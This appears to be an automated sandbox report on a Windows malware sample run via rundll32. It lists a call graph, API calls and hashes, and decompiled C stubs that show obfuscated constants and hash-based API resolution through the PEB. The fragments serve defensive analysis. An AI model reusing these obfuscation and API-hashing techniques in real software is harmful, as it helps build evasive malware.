41c6d9 GetPEB RtlAllocateHeap CloseHandle 31141->31236 31237 407ffe GetPEB RtlAllocateHeap 31141->31237 31238 410ec3 GetPEB RtlAllocateHeap 31141->31238 31239 40e044 GetPEB RtlAllocateHeap 31141->31239 31240 412fa1 6 API calls 31141->31240 31241 40434a GetPEB 31141->31241 31242 419dbf GetPEB CloseHandle 31141->31242 31143 407378 GetPEB 31142->31143 31144 41055b ExitProcess 31143->31144 31144->31105 31147 40ea30 31145->31147 31146 410b8a GetPEB RtlAllocateHeap LoadLibraryW 31146->31147 31147->31146 31148 40eb08 31147->31148 31148->31141 31160 401f54 31149->31160 31152 402125 31156 405ab8 2 API calls 31152->31156 31154 402141 31154->31141 31156->31154 31160->31152 31160->31154 31162 410d6d GetPEB 31160->31162 31245 40caa3 31160->31245 31258 41340e 31160->31258 31262 405dfc 31160->31262 31266 41d4e1 GetPEB 31160->31266 31267 4098c5 GetPEB 31160->31267 31268 405ab8 31160->31268 31272 40471a 31160->31272 31276 407626 GetPEB 31160->31276 31162->31160 31167 40ab09 31163->31167 31165 4054fb 2 API calls 31165->31167 31167->31165 31168 41340e 2 API calls 31167->31168 31169 40acd9 31167->31169 31170 405ab8 2 API calls 31167->31170 31171 40471a 2 API calls 31167->31171 31315 411f88 GetPEB 31167->31315 31316 40dfd8 GetPEB 31167->31316 31168->31167 31169->31141 31170->31167 31171->31167 31180 4051f7 31172->31180 31174 4053f0 31174->31141 31175 405dfc 2 API calls 31175->31180 31178 4053f2 31327 40f1ed 31178->31327 31180->31174 31180->31175 31180->31178 31181 410d6d GetPEB 31180->31181 31317 4141ca 31180->31317 31321 41c0c8 31180->31321 31325 40a4d7 GetPEB 31180->31325 31326 414291 GetPEB 31180->31326 31181->31180 31185 406203 31183->31185 31187 406367 31185->31187 31188 40f1ed 2 API calls 31185->31188 31190 41c0c8 2 API calls 31185->31190 31331 417a31 31185->31331 31335 414291 GetPEB 31185->31335 31336 40dfd8 GetPEB 31185->31336 31187->31141 31188->31185 31190->31185 31196 40d5ba 31191->31196 31193 40d6c5 31193->31141 31195 40d6c7 31351 4147b5 31195->31351 31196->31193 31196->31195 31198 405dfc 2 API calls 31196->31198 31200 410d6d GetPEB 31196->31200 31337 41cbe7 31196->31337 31361 40a4d7 GetPEB 31196->31361 31362 40dfd8 GetPEB 31196->31362 31198->31196 31200->31196 31204 41457d 31201->31204 31202 410321 2 API calls 31202->31204 31203 41469e 31205 405ab8 2 API calls 31203->31205 31204->31202 31204->31203 31206 405ab8 2 API calls 31204->31206 31207 41469c 31204->31207 31208 41340e 2 API calls 31204->31208 31394 40ff0d GetPEB 31204->31394 31205->31207 31206->31204 31207->31141 31208->31204 31395 411999 31210->31395 31212 404d5f 31214 41cbe7 2 API calls 31212->31214 31213 404d5d 31213->31141 31214->31213 31215 405dfc GetPEB RtlAllocateHeap 31220 404c22 31215->31220 31219 410d6d GetPEB 31219->31220 31220->31212 31220->31213 31220->31215 31220->31219 31398 40a4d7 GetPEB 31220->31398 31399 40a156 GetPEB 31220->31399 31400 41baec GetPEB 31220->31400 31221->31141 31222->31141 31223->31141 31224->31141 31225->31141 31226->31141 31227->31141 31228->31141 31229->31141 31230->31141 31232 410d7f 31231->31232 31233 40de81 GetPEB 31232->31233 31234 410dbe 31233->31234 31234->31141 31235->31141 31236->31141 31237->31141 31238->31141 31239->31141 31240->31141 31241->31141 31242->31141 31243->31113 31244->31113 31248 40cad2 31245->31248 31247 4054fb GetPEB RtlAllocateHeap 31247->31248 31248->31247 31249 40d189 31248->31249 31250 40d19b 31248->31250 31256 405ab8 2 API calls 31248->31256 31277 40de81 31248->31277 31283 4107a6 GetPEB 31248->31283 31284 410321 31248->31284 31288 40e48f GetPEB 31248->31288 31289 40ebc8 GetPEB 31248->31289 31290 40a156 GetPEB 31248->31290 31254 40de81 GetPEB 31249->31254 31250->31160 31254->31250 31256->31248 31259 413423 31258->31259 31260 407378 GetPEB 31259->31260 31261 4134cb OpenSCManagerW 31260->31261 31261->31160 31263 405e17 31262->31263 31306 4054fb 31263->31306 31266->31160 31267->31160 31269 405ace 31268->31269 31270 407378 GetPEB 31269->31270 31271 405b71 CloseServiceHandle 31270->31271 31271->31160 31273 404740 31272->31273 31274 407378 GetPEB 31273->31274 31275 4047d8 SHGetFolderPathW 31274->31275 31275->31160 31276->31160 31278 40de94 31277->31278 31291 407aa1 31278->31291 31283->31248 31285 41033d 31284->31285 31286 407378 GetPEB 31285->31286 31287 4103e1 OpenServiceW 31286->31287 31287->31248 31288->31248 31289->31248 31290->31248 31298 407378 31291->31298 31294 403a9d 31295 403ab8 31294->31295 31296 407378 GetPEB 31295->31296 31297 403b4c 31296->31297 31297->31248 31299 407464 31298->31299 31303 407490 31298->31303 31304 410223 GetPEB 31299->31304 31301 40747a 31305 41c4dd GetPEB 31301->31305 31303->31294 31304->31301 31305->31303 31307 407aa1 GetPEB 31306->31307 31308 40559d 31307->31308 31311 409b5e 31308->31311 31310 4055ae 31310->31160 31312 409b78 31311->31312 31313 407378 GetPEB 31312->31313 31314 409c2e RtlAllocateHeap 31313->31314 31314->31310 31315->31167 31316->31167 31318 4141ea 31317->31318 31319 407378 GetPEB 31318->31319 31320 41427f SetFileInformationByHandle 31319->31320 31320->31180 31322 41c0f8 31321->31322 31323 407378 GetPEB 31322->31323 31324 41c179 CreateFileW 31323->31324 31324->31180 31325->31180 31326->31180 31328 40f203 31327->31328 31329 407378 GetPEB 31328->31329 31330 40f29f CloseHandle 31329->31330 31330->31174 31332 417a51 31331->31332 31333 407378 GetPEB 31332->31333 31334 417adf 31333->31334 31334->31185 31335->31185 31336->31185 31338 41cc04 31337->31338 31363 405755 31338->31363 31341 405755 GetPEB 31342 41cea7 31341->31342 31343 405755 GetPEB 31342->31343 31344 41cebc 31343->31344 31367 4103f1 31344->31367 31347 4103f1 GetPEB 31348 41cef3 31347->31348 31371 40e554 31348->31371 31350 41cf23 31350->31196 31352 4147d2 31351->31352 31353 405dfc 2 API calls 31352->31353 31354 414981 31353->31354 31383 40ecbd 31354->31383 31357 410d6d GetPEB 31358 4149b1 31357->31358 31387 40eb1e 31358->31387 31360 4149c6 31360->31193 31361->31196 31362->31196 31364 40576d 31363->31364 31375 4109b8 31364->31375 31368 41040a 31367->31368 31369 407378 GetPEB 31368->31369 31370 4104b8 31369->31370 31370->31347 31372 40e567 31371->31372 31373 407378 GetPEB 31372->31373 31374 40e607 SHFileOperationW 31373->31374 31374->31350 31376 4109d1 31375->31376 31379 41e232 31376->31379 31380 41e24d 31379->31380 31381 407378 GetPEB 31380->31381 31382 4057cc 31381->31382 31382->31341 31384 40ecdc 31383->31384 31391 414150 31384->31391 31388 40eb31 31387->31388 31389 407378 GetPEB 31388->31389 31390 40ebbc DeleteFileW 31389->31390 31390->31360 31392 407378 GetPEB 31391->31392 31393 40ecf6 31392->31393 31393->31357 31394->31204 31396 407378 GetPEB 31395->31396 31397 411a3f 31396->31397 31397->31220 31398->31220 31399->31220 31400->31220 31401 4099ef 31402 409a92 31401->31402 31403 409ab9 31401->31403 31407 41a0f1 31402->31407 31406 4104c7 2 API calls 31406->31403 31415 41a681 31407->31415 31408 40471a 2 API calls 31408->31415 31409 405dfc GetPEB RtlAllocateHeap 31409->31415 31410 405755 GetPEB 31410->31415 31412 41a883 31424 406417 31412->31424 31415->31408 31415->31409 31415->31410 31415->31412 31417 409aa5 31415->31417 31419 410d6d GetPEB 31415->31419 31420 407f4b 31415->31420 31434 410dc5 GetPEB 31415->31434 31435 40dfd8 GetPEB 31415->31435 31436 40a4d7 GetPEB 31415->31436 31417->31403 31417->31406 31419->31415 31421 407f64 31420->31421 31422 407378 GetPEB 31421->31422 31423 407ff0 lstrcmpiW 31422->31423 31423->31415 31425 406445 31424->31425 31426 405755 GetPEB 31425->31426 31427 40668d 31426->31427 31437 41b86e 31427->31437 31429 4066c9 31430 40f1ed 2 API calls 31429->31430 31433 4066d4 31429->31433 31431 4066f4 31430->31431 31432 40f1ed 2 API calls 31431->31432 31432->31433 31433->31417 31434->31415 31435->31415 31436->31415 31438 41b8aa 31437->31438 31439 407378 GetPEB 31438->31439 31440 41b92d CreateProcessW 31439->31440 31440->31429

                                                                      Executed Functions

                                                                      Function 00463928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136filememoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 472 463928-4639b4 call 4479dc 477 4639b6 472->477 478 4639bd-4639cf GetEnhMetaFileA 472->478 477->478 480 4639d1 478->480 481 4639d8-4639ec 478->481 480->481 482 463a0e-463ac5 VirtualAlloc 481->482 483 4639ee-463a0c 481->483 491 463acf-463ada 482->491 483->482 492 463b21-463b33 491->492 493 463adc-463b1f 491->493 494 463b75-463bac 492->494 495 463b35-463b73 492->495 493->491 495->494 495->495
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 004639C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,00466CB4,00001000,00000040), ref: 00463A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345$|lF
                                                                      • API String ID: 2643768156-462011533
                                                                      • Opcode ID: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
                                                                      • Instruction ID: 00c49ef07d34f105fcf4d433495aa085861750dc82918067735be55c91b233ef
                                                                      • Opcode Fuzzy Hash: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
                                                                      • Instruction Fuzzy Hash: 8561B5B0601A409FE740DF69ED86A0537A5F704309B12853AE589972B1FFF5A854CF4F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004104C7, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 497 4104c7-410565 call 407378 ExitProcess
                                                                      C-Code - Quality: 100%
                                                                      			E004104C7() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t48;
				signed int _t49;

				_v8 = 0xb3b9;
				_v8 = _v8 + 0x1dd8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000002ef;
				_v20 = 0x5082;
				_t48 = 0xc;
				_v20 = _v20 / _t48;
				_v20 = _v20 ^ 0x00006c35;
				_v12 = 0x710;
				_v12 = _v12 >> 3;
				_t49 = 0x6d;
				_v12 = _v12 / _t49;
				_v12 = _v12 ^ 0x0000532a;
				_v16 = 0x5a4c;
				_v16 = _v16 ^ 0xca4a1f4d;
				_v16 = _v16 ^ 0xca4a24cd;
				E00407378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
				ExitProcess(0);
			}









                                                                      0x004104cd
                                                                      0x004104d6
                                                                      0x004104dd
                                                                      0x004104e1
                                                                      0x004104e5
                                                                      0x004104ec
                                                                      0x004104f8
                                                                      0x004104fd
                                                                      0x00410502
                                                                      0x00410509
                                                                      0x00410510
                                                                      0x00410517
                                                                      0x0041051f
                                                                      0x00410522
                                                                      0x00410529
                                                                      0x00410530
                                                                      0x00410537
                                                                      0x00410556
                                                                      0x00410560

                                                                      APIs
                                                                      • ExitProcess.KERNEL32(00000000), ref: 00410560
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID: *S$5l$LZ
                                                                      • API String ID: 621844428-1939029103
                                                                      • Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction ID: 8a4a50fccc019cea45a05ef1885fd17a53ef087f713c54163174b183f339ab60
                                                                      • Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction Fuzzy Hash: 2311F771E0520CEBEB04DFE5D84AA9EBBB1EB50714F10C189E414A7284D7F96B54CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00409B5E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 526 409b5e-409c3f call 412550 call 407378 RtlAllocateHeap
                                                                      C-Code - Quality: 72%
                                                                      			E00409B5E(void* __ecx, long __edx, long _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t52;
				void* _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				long _t81;

				_push(_a12);
				_t81 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00412550(_t52);
				_v36 = 0x84647;
				asm("stosd");
				asm("stosd");
				_t70 = 0x14;
				asm("stosd");
				_v20 = 0xbd42;
				_t71 = 0x62;
				_v20 = _v20 / _t70;
				_v20 = _v20 ^ 0x00000265;
				_v16 = 0x7dd6;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x742f5ff0;
				_v16 = _v16 ^ 0x742f2524;
				_v12 = 0x61c8;
				_t72 = 0x48;
				_v12 = _v12 / _t72;
				_v12 = _v12 + 0xffff34fc;
				_v12 = _v12 ^ 0xffff6696;
				_v8 = 0xb2ad;
				_v8 = _v8 * 0x5f;
				_v8 = _v8 * 0xd;
				_v8 = _v8 | 0x4443bccc;
				_v8 = _v8 ^ 0x475ff878;
				E00407378(_t72, 0xa835739b, _t72, 0x90f109b3, 0x146);
				_t68 = RtlAllocateHeap(_a8, _a4, _t81); // executed
				return _t68;
			}















                                                                      0x00409b66
                                                                      0x00409b69
                                                                      0x00409b6b
                                                                      0x00409b6e
                                                                      0x00409b71
                                                                      0x00409b73
                                                                      0x00409b78
                                                                      0x00409b87
                                                                      0x00409b8c
                                                                      0x00409b8d
                                                                      0x00409b90
                                                                      0x00409b91
                                                                      0x00409b9d
                                                                      0x00409b9e
                                                                      0x00409ba3
                                                                      0x00409baa
                                                                      0x00409bb8
                                                                      0x00409bbd
                                                                      0x00409bc4
                                                                      0x00409bcb
                                                                      0x00409bd5
                                                                      0x00409bdd
                                                                      0x00409be0
                                                                      0x00409be7
                                                                      0x00409bee
                                                                      0x00409c05
                                                                      0x00409c0c
                                                                      0x00409c0f
                                                                      0x00409c16
                                                                      0x00409c29
                                                                      0x00409c38
                                                                      0x00409c3f

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(742F2524,FFFF6696,?,?,?,?,?,?,?,?,?,00000000), ref: 00409C38
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID: $%/t
                                                                      • API String ID: 1279760036-1978068534
                                                                      • Opcode ID: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
                                                                      • Instruction ID: 291bc368fe39a279b6a73a568581b61c4ea3bd0b76b1db960726e9f41e5a5dee
                                                                      • Opcode Fuzzy Hash: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
                                                                      • Instruction Fuzzy Hash: C2214671D00209BBEB18CFA9C9469DEBBB5FB44310F108099E814AA2A0D7B9AB109B51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00461638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 531 461638-461641 532 461643 531->532 533 46164b-4616d1 DdeInitializeA call 461328 call 461a14 531->533 532->533 543 4616d6-4616eb 533->543
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00461686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
                                                                      • Instruction ID: d0869bd9eca08793bd1e582bf0eae279adb1ed532342e6143eed6f974ddeb4d0
                                                                      • Opcode Fuzzy Hash: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
                                                                      • Instruction Fuzzy Hash: F21194706007006FD710EF76CD82B4E77E9AF45744B54583AF800E76A1FA79A901875E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0021EB40, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 545 21eb40-21eb93 VirtualProtect 546 21eb95-21eba1 545->546 547 21eba6-21ec17 545->547 548 21ec3a-21ec85 call 21e7a0 call 21e7e0 546->548 547->548 565 21ec19-21ec37 547->565 555 21ec90-21ec9a 548->555 557 21ecf8-21ed4a call 21e920 555->557 558 21ec9c-21eca3 555->558 568 21ed78-21ed7f 557->568 569 21ed4c-21ed50 557->569 559 21eca5-21ecac 558->559 560 21eced-21ecf6 558->560 559->560 563 21ecae-21ecea call 21e7e0 559->563 560->555 563->560 565->548 571 21ed8a-21ed94 568->571 569->568 570 21ed52-21ed75 call 21e880 569->570 570->568 575 21ede6-21ee1b call 21f000 571->575 576 21ed96-21ed9d 571->576 578 21eddb-21ede4 576->578 579 21ed9f-21eda6 576->579 578->571 579->578 581 21eda8-21edd9 call 21ee20 VirtualProtect 579->581 581->578
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0021EB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0021EDD9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2097597853.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_200000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: 5e6dff41a4f1c4064e0987803c0cb09141899f5af9cc0b9417aebc8e17a0d23e
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 86C1C974A10109DFCB48CF88C990EAEB7B6BF88304F258159E8199B351D735EE92CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00461A14, Relevance: 3.1, APIs: 2, Instructions: 56serviceCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 586 461a14-461a5a call 461ac8 592 461a70-461aa7 DdeCreateStringHandleA DdeNameService 586->592 593 461a5c-461a69 586->593 596 461aaf 592->596 593->592
                                                                      APIs
                                                                        • Part of subcall function 00461AC8: DdeFreeStringHandle.USER32(?,?), ref: 00461AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 00461A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00461A95
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
                                                                      • Instruction ID: 9d8230b8b9786ad70cb23cfc8f07923e913d2bc7bc66b4dc0d7f0c12b5e74525
                                                                      • Opcode Fuzzy Hash: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
                                                                      • Instruction Fuzzy Hash: 5E1182717112545BCB11EAA5C882A4A37ACAF89B04B5405BAFD00EB296E678ED008799
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00407F4B, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 80%
                                                                      			E00407F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				int _t43;
				WCHAR* _t46;

				_push(_a12);
				_t46 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00412550(_t35);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x71485a;
				_v28 = 0x57c810;
				_v20 = 0x2813;
				_v20 = _v20 * 0x59;
				_v20 = _v20 ^ 0x000dd428;
				_v16 = 0xdb84;
				_v16 = _v16 | 0xe2c96d38;
				_v16 = _v16 ^ 0xe2c994d7;
				_v12 = 0xc19e;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000060ae;
				_v8 = 0x265e;
				_v8 = _v8 + 0x315a;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x02bd94c0;
				E00407378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
				_t43 = lstrcmpiW(_t46, _a4); // executed
				return _t43;
			}













                                                                      0x00407f52
                                                                      0x00407f55
                                                                      0x00407f57
                                                                      0x00407f5a
                                                                      0x00407f5e
                                                                      0x00407f5f
                                                                      0x00407f64
                                                                      0x00407f6b
                                                                      0x00407f72
                                                                      0x00407f79
                                                                      0x00407f94
                                                                      0x00407f97
                                                                      0x00407f9e
                                                                      0x00407fa5
                                                                      0x00407fac
                                                                      0x00407fb3
                                                                      0x00407fba
                                                                      0x00407fbe
                                                                      0x00407fc5
                                                                      0x00407fcc
                                                                      0x00407fd3
                                                                      0x00407fd7
                                                                      0x00407feb
                                                                      0x00407ff7
                                                                      0x00407ffd

                                                                      APIs
                                                                      • lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 00407FF7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: ZHq
                                                                      • API String ID: 1586166983-2177431251
                                                                      • Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction ID: d902e23f6411a0c44fb82a2e6a8296566946c79d4f08726a750a0587d667c915
                                                                      • Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction Fuzzy Hash: EC110FB6C00219BBDF00DFA4C94A8DEBFB4EF04318F108589E92466241D3B95B14DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0021E620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0021E6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2097597853.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_200000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: c5dc204696ff134c685e4087e096a134bd5f6fce9636fa9a69615cf6ed19777e
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: D4111260D082C9DEEF01DBE898097FFBFB55F21704F044098D9456B282D6BA57588BB6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041B86E, Relevance: 1.6, APIs: 1, Instructions: 74processCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 40%
                                                                      			E0041B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t49;
				int _t58;
				signed int _t60;
				int _t65;

				_push(_a68);
				_t65 = __ecx;
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00412550(_t49);
				_v12 = 0xd1fa;
				_t60 = 0x3c;
				_v12 = _v12 / _t60;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x00001682;
				_v20 = 0xd4c2;
				_v20 = _v20 + 0x3986;
				_v20 = _v20 ^ 0x00013905;
				_v8 = 0x8c53;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x000060d6;
				_v16 = 0x467b;
				_v16 = _v16 + 0xffff2b71;
				_v16 = _v16 ^ 0xffff105c;
				E00407378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
				return _t58;
			}











                                                                      0x0041b876
                                                                      0x0041b87b
                                                                      0x0041b87d
                                                                      0x0041b87e
                                                                      0x0041b881
                                                                      0x0041b884
                                                                      0x0041b887
                                                                      0x0041b88a
                                                                      0x0041b88d
                                                                      0x0041b890
                                                                      0x0041b891
                                                                      0x0041b892
                                                                      0x0041b893
                                                                      0x0041b896
                                                                      0x0041b897
                                                                      0x0041b89a
                                                                      0x0041b89d
                                                                      0x0041b8a0
                                                                      0x0041b8a4
                                                                      0x0041b8a5
                                                                      0x0041b8aa
                                                                      0x0041b8bb
                                                                      0x0041b8c3
                                                                      0x0041b8c6
                                                                      0x0041b8ca
                                                                      0x0041b8d1
                                                                      0x0041b8d8
                                                                      0x0041b8df
                                                                      0x0041b8e6
                                                                      0x0041b8ed
                                                                      0x0041b8f1
                                                                      0x0041b8f4
                                                                      0x0041b8fb
                                                                      0x0041b902
                                                                      0x0041b909
                                                                      0x0041b928
                                                                      0x0041b942
                                                                      0x0041b949

                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0041B942
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
